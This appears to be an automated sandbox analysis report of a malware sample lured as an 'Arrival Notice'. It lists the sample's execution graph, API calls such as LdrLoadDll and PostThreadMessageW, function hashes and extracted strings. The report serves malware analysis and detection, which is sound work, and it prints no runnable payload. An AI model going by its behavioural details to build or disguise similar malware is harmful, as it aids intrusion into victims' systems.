                                                                              • Opcode ID: 51b6d00dd620235b4aaa59cd888bd3b1d6703a4f5d90f729fe93eb23643ccf77
                                                                              • Instruction ID: 316a8b73f8792b59c3800073083f2699bd39e1d70c07d914ee1f7b4d0b8d462d
                                                                              • Opcode Fuzzy Hash: 51b6d00dd620235b4aaa59cd888bd3b1d6703a4f5d90f729fe93eb23643ccf77
                                                                              • Instruction Fuzzy Hash: 1BA17232E0021ACFCF2ADFB8C85059EBBF6FF85304B15456AE905AB2A5DB31D955CB40

                                                                              Execution Graph

                                                                              Execution Coverage:1.2%
                                                                              Dynamic/Decrypted Code Coverage:4.5%
                                                                              Signature Coverage:7.1%
                                                                              Total number of Nodes:154
                                                                              Total number of Limit Nodes:13
                                                                              execution_graph 93670 424303 93671 42431f 93670->93671 93672 424347 93671->93672 93673 42435b 93671->93673 93674 42b543 NtClose 93672->93674 93680 42b543 93673->93680 93676 424350 93674->93676 93677 424364 93683 42d563 RtlAllocateHeap 93677->93683 93679 42436f 93681 42b560 93680->93681 93682 42b571 NtClose 93681->93682 93682->93677 93683->93679 93684 42e523 93685 42e533 93684->93685 93686 42e539 93684->93686 93689 42d523 93686->93689 93688 42e55f 93692 42b863 93689->93692 93691 42d53e 93691->93688 93693 42b87d 93692->93693 93694 42b88e RtlAllocateHeap 93693->93694 93694->93691 93709 42ab33 93710 42ab4d 93709->93710 93713 15b2df0 LdrInitializeThunk 93710->93713 93711 42ab75 93713->93711 93714 424693 93715 4246a2 93714->93715 93716 4246e9 93715->93716 93719 42472a 93715->93719 93721 42472f 93715->93721 93722 42d443 93716->93722 93720 42d443 RtlFreeHeap 93719->93720 93720->93721 93725 42b8b3 93722->93725 93724 4246f9 93726 42b8cd 93725->93726 93727 42b8de RtlFreeHeap 93726->93727 93727->93724 93695 413f43 93696 413f5d 93695->93696 93701 417933 93696->93701 93698 413f7b 93699 413fc0 93698->93699 93700 413faf PostThreadMessageW 93698->93700 93700->93699 93702 417957 93701->93702 93703 417993 LdrLoadDll 93702->93703 93704 41795e 93702->93704 93703->93704 93704->93698 93705 41af83 93706 41afc7 93705->93706 93707 42b543 NtClose 93706->93707 93708 41afe8 93706->93708 93707->93708 93728 41a493 93729 41a4ab 93728->93729 93731 41a505 93728->93731 93729->93731 93732 41e0a3 93729->93732 93733 41e0c9 93732->93733 93737 41e1b7 93733->93737 93738 42e653 93733->93738 93735 41e15b 93735->93737 93744 42ab83 93735->93744 93737->93731 93739 42e5c3 93738->93739 93740 42d523 RtlAllocateHeap 93739->93740 93742 42e620 93739->93742 93741 42e5fd 93740->93741 93743 42d443 RtlFreeHeap 93741->93743 93742->93735 93743->93742 93745 42ab9d 93744->93745 93748 15b2c0a 93745->93748 93746 42abc9 93746->93737 93749 15b2c1f LdrInitializeThunk 93748->93749 93750 15b2c11 93748->93750 93749->93746 93750->93746 93751 401cb8 93752 401ce1 93751->93752 93755 42e9e3 93752->93755 93758 42d033 93755->93758 93759 42d059 93758->93759 93770 4075b3 93759->93770 93761 42d06f 93769 401d1a 93761->93769 93773 41ad93 93761->93773 93763 42d08e 93764 42d0a3 93763->93764 93788 42b903 93763->93788 93784 4275b3 93764->93784 93767 42d0b2 93768 42b903 ExitProcess 93767->93768 93768->93769 93791 416663 93770->93791 93772 4075c0 93772->93761 93774 41adbf 93773->93774 93806 41ac83 93774->93806 93777 41ae04 93780 41ae20 93777->93780 93782 42b543 NtClose 93777->93782 93778 41adec 93779 41adf7 93778->93779 93781 42b543 NtClose 93778->93781 93779->93763 93780->93763 93781->93779 93783 41ae16 93782->93783 93783->93763 93785 42760d 93784->93785 93787 42761a 93785->93787 93817 418483 93785->93817 93787->93767 93789 42b920 93788->93789 93790 42b931 ExitProcess 93789->93790 93790->93764 93793 41667a 93791->93793 93792 416693 93792->93772 93793->93792 93798 42bf93 93793->93798 93795 4166e4 93795->93792 93805 4281e3 NtClose LdrInitializeThunk 93795->93805 93797 41670a 93797->93772 93800 42bfab 93798->93800 93799 42bfcf 93799->93795 93800->93799 93801 42ab83 LdrInitializeThunk 93800->93801 93802 42c024 93801->93802 93803 42d443 RtlFreeHeap 93802->93803 93804 42c03d 93803->93804 93804->93795 93805->93797 93807 41ad79 93806->93807 93808 41ac9d 93806->93808 93807->93777 93807->93778 93812 42ac23 93808->93812 93811 42b543 NtClose 93811->93807 93813 42ac40 93812->93813 93816 15b35c0 LdrInitializeThunk 93813->93816 93814 41ad6d 93814->93811 93816->93814 93819 4184ad 93817->93819 93818 41891b 93818->93787 93819->93818 93825 414073 93819->93825 93821 4185ba 93821->93818 93822 42d443 RtlFreeHeap 93821->93822 93823 4185d2 93822->93823 93823->93818 93824 42b903 ExitProcess 93823->93824 93824->93818 93832 414092 93825->93832 93826 4141e7 93826->93821 93827 4141b0 93827->93826 93844 41b0a3 RtlFreeHeap LdrInitializeThunk 93827->93844 93829 4141c4 93829->93826 93845 41b0a3 RtlFreeHeap LdrInitializeThunk 93829->93845 93831 4141dd 93831->93821 93832->93826 93832->93827 93834 4141a6 93832->93834 93836 427753 93832->93836 93841 413ac3 93834->93841 93837 4277b0 93836->93837 93838 4277eb 93837->93838 93846 4141f3 93837->93846 93838->93832 93840 4277cd 93840->93832 93856 42b7c3 93841->93856 93844->93829 93845->93831 93847 4141bb 93846->93847 93847->93847 93848 41420f 93847->93848 93854 41b0a3 RtlFreeHeap LdrInitializeThunk 93847->93854 93848->93840 93850 4141c4 93851 4141e9 93850->93851 93855 41b0a3 RtlFreeHeap LdrInitializeThunk 93850->93855 93851->93840 93853 4141dd 93853->93840 93854->93850 93855->93853 93857 42b7e0 93856->93857 93860 15b2c70 LdrInitializeThunk 93857->93860 93858 413ae5 93858->93827 93860->93858 93861 418b38 93862 418b42 93861->93862 93863 42b543 NtClose 93861->93863 93863->93862 93864 15b2b60 LdrInitializeThunk

                                                                              Executed Functions

                                                                              Function 00417933 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 179 417933-41795c call 42e143 182 417962-417970 call 42e663 179->182 183 41795e-417961 179->183 186 417980-417991 call 42cb03 182->186 187 417972-41797d call 42e903 182->187 192 417993-4179a7 LdrLoadDll 186->192 193 4179aa-4179ad 186->193 187->186 192->193
                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004179A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_400000_Arrival Notice.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: c839b24bd16572aed6a7051c7c2bbafa6a578f71075491fecf3231fa6de0353c
                                                                              • Instruction ID: cf70dd02b42f83f92b302e931271253000a32e180e5cfd414d045845ce8d9469
                                                                              • Opcode Fuzzy Hash: c839b24bd16572aed6a7051c7c2bbafa6a578f71075491fecf3231fa6de0353c
                                                                              • Instruction Fuzzy Hash: A3015EB1E5420DABDB10DBA5DC86FDEB3789B54304F0081AAE90897240F639EB588B95
                                                                              Function 0042B543 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 199 42b543-42b57f call 404a83 call 42c603 NtClose
                                                                              APIs
                                                                              • NtClose.NTDLL(?,0041656F,001F0001,?,00000000,?,?,00000104), ref: 0042B57A
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_400000_Arrival Notice.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: 5bf140ce2b7ee9b7289b441804a8eb77268ac8134a6b87ce6c3746fa3cd9d41f
                                                                              • Instruction ID: 937b2143e71a539af599f96f4abd8ce02b0dce4f2453741a7da5df85edb86ca1
                                                                              • Opcode Fuzzy Hash: 5bf140ce2b7ee9b7289b441804a8eb77268ac8134a6b87ce6c3746fa3cd9d41f
                                                                              • Instruction Fuzzy Hash: B1E086323006147BC610EA5ADC41F9B779CDFC5715F40841AFA0977181C771790187F5
                                                                              Function 015B2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 213 15b2b60-15b2b6c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 5119fbf7799fb7e6a57163a2ab5717523d53acf4a132df679d55a51eb4d9017f
                                                                              • Instruction ID: 4f5c3802fb4b7742b5a23f9ba435ed74dd2018eef5863b7add6d916cabed5e9d
                                                                              • Opcode Fuzzy Hash: 5119fbf7799fb7e6a57163a2ab5717523d53acf4a132df679d55a51eb4d9017f
                                                                              • Instruction Fuzzy Hash: 39900261202400074105759D4814616404AA7E0611B59C425E1014990DC56689916225
                                                                              Function 015B2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 215 15b2df0-15b2dfc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: b0f3d39b23c364e8f0752566133ec8bf23fba33ef16759b62c8429b600cc9b70
                                                                              • Instruction ID: 34fed4c6b029f2b6ef0d810d77237e95173b76e2c54fc84c1349358af9550896
                                                                              • Opcode Fuzzy Hash: b0f3d39b23c364e8f0752566133ec8bf23fba33ef16759b62c8429b600cc9b70
                                                                              • Instruction Fuzzy Hash: 3490023120140417D111759D49047070049A7D0651F99C816A0424958DD6978A52A221
                                                                              Function 015B2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 214 15b2c70-15b2c7c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 9c94603489932eebf42451af0b7e4b9043eeaa2f071405b6cac59e0b3e021337
                                                                              • Instruction ID: 21ab2006751641ba5a44771b1cd1e3d4c1a6b7e2d528fcf58d78a3f6bad38dd8
                                                                              • Opcode Fuzzy Hash: 9c94603489932eebf42451af0b7e4b9043eeaa2f071405b6cac59e0b3e021337
                                                                              • Instruction Fuzzy Hash: 2790023120148806D110759D880474A0045A7D0711F5DC815A4424A58DC6D689917221
                                                                              Function 015B35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 216 15b35c0-15b35cc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 640526cc6b87ba9ca2d8c44e3950e7ef4861e06f0bab1d6f0056db4244b0cd06
                                                                              • Instruction ID: 8bcf08380ab0fb2dfbac47aafb864ecd3226eec1f5e8d80db1049d97c907147b
                                                                              • Opcode Fuzzy Hash: 640526cc6b87ba9ca2d8c44e3950e7ef4861e06f0bab1d6f0056db4244b0cd06
                                                                              • Instruction Fuzzy Hash: 4790023160550406D100759D49147061045A7D0611F69C815A0424968DC7D68A5166A2
                                                                              Function 00413E00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 413e00-413e02 1 413e55-413e64 0->1 2 413e04-413e0b 0->2 5 413e67-413e69 1->5 3 413dfd-413dfe 2->3 4 413e0d-413e19 2->4 3->0 4->5 6 413e1b-413e36 4->6 7 413ec4-413ee2 5->7 8 413e6a-413e76 5->8 9 413df7-413dfc 6->9 10 413e38-413e3a 6->10 14 413ee4-413ef5 7->14 15 413f29-413f31 7->15 11 413e78-413e8b 8->11 12 413e3f-413e4f 8->12 9->3 10->12 11->7 12->1 16 413f91-413fad 15->16 17 413f33-413f3a 15->17 18 413fcd-413fd3 16->18 19 413faf-413fbe PostThreadMessageW 16->19 19->18 20 413fc0-413fca 19->20 20->18
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_400000_Arrival Notice.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 66159w4$66159w4
                                                                              • API String ID: 0-1576546964
                                                                              • Opcode ID: 38f054a78870f869ed828e8be13c9782f78306e7c6e2d5508bda4523ac360c5e
                                                                              • Instruction ID: ea6108b1436ed194fed4adbf68883a8af87e5b94fa50a412f37eaa4fea503ac8
                                                                              • Opcode Fuzzy Hash: 38f054a78870f869ed828e8be13c9782f78306e7c6e2d5508bda4523ac360c5e
                                                                              • Instruction Fuzzy Hash: 5831DE72A44308AAD7114EB9E885CEBBFF8AA4176271040CBF5448B352D6244F83CB94
                                                                              Function 00413F3B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 21 413f3b-413f8b call 42d4e3 call 42def3 call 417933 call 4049f3 31 413f91-413fad 21->31 32 413f8c call 4247a3 21->32 33 413fcd-413fd3 31->33 34 413faf-413fbe PostThreadMessageW 31->34 32->31 34->33 35 413fc0-413fca 34->35 35->33
                                                                              APIs
                                                                              • PostThreadMessageW.USER32(66159w4,00000111,00000000,00000000), ref: 00413FBA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_400000_Arrival Notice.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID: 66159w4$66159w4
                                                                              • API String ID: 1836367815-1576546964
                                                                              • Opcode ID: 7d27fbe7ccb01abb59a12a813e0ae5ed4f5f33e9c056934e58569f2ac88fd625
                                                                              • Instruction ID: 81527b3ea31c7f7c3721cf510f6ed77245fa7ad964fc8f5d8c7db5374fefc8ef
                                                                              • Opcode Fuzzy Hash: 7d27fbe7ccb01abb59a12a813e0ae5ed4f5f33e9c056934e58569f2ac88fd625
                                                                              • Instruction Fuzzy Hash: DA11E5B2D4021C7ADB11AAA19C82DEF7B7C9F41798F44806AF904A7241D6785E0687A1
                                                                              Function 00413F43 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 36 413f43-413f8b call 42d4e3 call 42def3 call 417933 call 4049f3 45 413f91-413fad 36->45 46 413f8c call 4247a3 36->46 47 413fcd-413fd3 45->47 48 413faf-413fbe PostThreadMessageW 45->48 46->45 48->47 49 413fc0-413fca 48->49 49->47
                                                                              APIs
                                                                              • PostThreadMessageW.USER32(66159w4,00000111,00000000,00000000), ref: 00413FBA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_400000_Arrival Notice.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID: 66159w4$66159w4
                                                                              • API String ID: 1836367815-1576546964
                                                                              • Opcode ID: 96e0f7d925b9f8e80cb8809b958b2dc711033ba7514e0518aba4b15de443b2a7
                                                                              • Instruction ID: 5f87467ec1f60fc95d48d39a2a54b839da88c356cbad407cbbcfe12d7d50108c
                                                                              • Opcode Fuzzy Hash: 96e0f7d925b9f8e80cb8809b958b2dc711033ba7514e0518aba4b15de443b2a7
                                                                              • Instruction Fuzzy Hash: 280104B2D4021C7ADB10AAE19C82DEF7B7CDF41798F40802AFA0467241D67C5E0687B1
                                                                              Function 0042B8B3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 59 42b8b3-42b8f4 call 404a83 call 42c603 RtlFreeHeap
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B8EF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_400000_Arrival Notice.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID: fA
                                                                              • API String ID: 3298025750-3595381179
                                                                              • Opcode ID: b0092315f3663950749282f3922fd1a6698e08528b5ad2d216465ea922ad7804
                                                                              • Instruction ID: dfbb5c3547ebb858c08b1ac9d81141c24dd5f15d3fc1526cd94386d96c20186d
                                                                              • Opcode Fuzzy Hash: b0092315f3663950749282f3922fd1a6698e08528b5ad2d216465ea922ad7804
                                                                              • Instruction Fuzzy Hash: E5E06D713042087FDA14EE59DC41F9B73ACEFCA710F40001AFA08A7282CA70B910CBB9
                                                                              Function 0042B863 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 194 42b863-42b8a4 call 404a83 call 42c603 RtlAllocateHeap
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(?,0041E15B,?,?,00000000,?,0041E15B,?,?,?), ref: 0042B89F
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_400000_Arrival Notice.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 0007e9899bb8d65442dd252decc12257072bc535ee3325ccaa2c241a00c20d8b
                                                                              • Instruction ID: 94be8940b4570a8ccafeb8e2c3bf58cee7564142d4f8afe53f0fb8bdc2f5dfe8
                                                                              • Opcode Fuzzy Hash: 0007e9899bb8d65442dd252decc12257072bc535ee3325ccaa2c241a00c20d8b
                                                                              • Instruction Fuzzy Hash: 0EE06DB23042047BCA10EE59EC41E9B73ADEFC5724F404019FD08A7281C771B910CBB9
                                                                              Function 0042B903 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 204 42b903-42b93f call 404a83 call 42c603 ExitProcess
                                                                              APIs
                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,52AC804A,?,?,52AC804A), ref: 0042B93A
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_400000_Arrival Notice.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExitProcess
                                                                              • String ID:
                                                                              • API String ID: 621844428-0
                                                                              • Opcode ID: 670a3434f9ebf08651ab7438c8f745d2888e1581b7f8773cc8c952b12289d4fb
                                                                              • Instruction ID: 1635fe3acdd37ffb3153f7aed0ca08cc1fda1c62ea01f9124036e0877a845f8b
                                                                              • Opcode Fuzzy Hash: 670a3434f9ebf08651ab7438c8f745d2888e1581b7f8773cc8c952b12289d4fb
                                                                              • Instruction Fuzzy Hash: A6E086362402147BD620EA5AEC41F9B776CEFC5724F004119FA0867241C7717A0187F8
                                                                              Function 015B2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 209 15b2c0a-15b2c0f 210 15b2c1f-15b2c26 LdrInitializeThunk 209->210 211 15b2c11-15b2c18 209->211
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: e6b76d64412c5bfe4f6bb0134032b84f7737154d6578656048a2e75d2017c16f
                                                                              • Instruction ID: d35ac87b7e2c0a6c3decedb57c13010fd640b807464c18b27c0591a049cac35f
                                                                              • Opcode Fuzzy Hash: e6b76d64412c5bfe4f6bb0134032b84f7737154d6578656048a2e75d2017c16f
                                                                              • Instruction Fuzzy Hash: 56B09B719015C5D9DA11E7A54A0871B7A4077D0711F29C465D2030A41F4779D5D1E275

                                                                              Non-executed Functions

                                                                              Function 015F2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-2160512332
                                                                              • Opcode ID: 011d27344f96de7c59f53af6931e4dd74978446d36baccfa7b182809d17a17c5
                                                                              • Instruction ID: b25ce205debfad39d99aad3f1168c2a25a0215d135cbcd7e9419170ecfe1c95f
                                                                              • Opcode Fuzzy Hash: 011d27344f96de7c59f53af6931e4dd74978446d36baccfa7b182809d17a17c5
                                                                              • Instruction Fuzzy Hash: 5E927DB1608742AFE721DE29C880B6BB7E8BB84754F04491DFB95DF291D770E844CB92
                                                                              Function 015A8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015E540A, 015E5496, 015E5519
                                                                              • corrupted critical section, xrefs: 015E54C2
                                                                              • 8, xrefs: 015E52E3
                                                                              • Critical section address., xrefs: 015E5502
                                                                              • undeleted critical section in freed memory, xrefs: 015E542B
                                                                              • Thread identifier, xrefs: 015E553A
                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015E54CE
                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 015E5543
                                                                              • Critical section address, xrefs: 015E5425, 015E54BC, 015E5534
                                                                              • Critical section debug info address, xrefs: 015E541F, 015E552E
                                                                              • Invalid debug info address of this critical section, xrefs: 015E54B6
                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015E54E2
                                                                              • double initialized or corrupted critical section, xrefs: 015E5508
                                                                              • Address of the debug info found in the active list., xrefs: 015E54AE, 015E54FA
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                              • API String ID: 0-2368682639
                                                                              • Opcode ID: 0c938c820caa291cb367b3d21178b6bce8c9776948e64a8eecc86b39412e4a9f
                                                                              • Instruction ID: 241299a6678175fd8373dccdedd796a929479679095eecb2edf93ca5afaa7149
                                                                              • Opcode Fuzzy Hash: 0c938c820caa291cb367b3d21178b6bce8c9776948e64a8eecc86b39412e4a9f
                                                                              • Instruction Fuzzy Hash: EE818C75E40349EFEB64CF9ACC45BAEBBF5BB48708F10415AE905BB251D371A940CB60
                                                                              Function 015A29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 015E2409
                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 015E2624
                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 015E2602
                                                                              • @, xrefs: 015E259B
                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015E25EB
                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015E22E4
                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 015E2498
                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 015E2506
                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 015E261F
                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015E24C0
                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 015E2412
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
